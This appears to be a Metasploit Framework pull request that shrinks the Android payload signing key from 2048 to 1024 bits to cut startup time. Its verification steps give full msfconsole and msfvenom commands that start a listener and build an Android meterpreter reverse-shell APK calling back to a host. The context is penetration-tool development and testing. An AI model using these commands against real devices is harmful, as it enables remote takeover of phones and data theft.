### PR TITLE
reduce startup time by reducing Android PKey size from 2048 to 1024

### DIFF
--- a/lib/msf/core/payload/android.rb
+++ b/lib/msf/core/payload/android.rb
@@ -10,7 +10,7 @@ module Msf::Payload::Android
   include Msf::Payload::UUID::Options
 
   def signing_key
-    @@signing_key ||= OpenSSL::PKey::RSA.new(2048)
+    @@signing_key ||= OpenSSL::PKey::RSA.new(1024)
   end
 
   #


### PR DESCRIPTION
As discussed here: https://github.com/rapid7/metasploit-framework/pull/7292#discussion_r399343619

Reducing the PKey size decreases the startup time of both msfvenom and msfconsole

## Verification

List the steps needed to make sure this thing works

- [ ] `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [ ] `msfvenom -p android/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o met.apk`
- [ ] Install and run the APK on an Android device or emulator
- [ ] **Verify** the payload still works
- [ ] **Verify** the startup time is faster

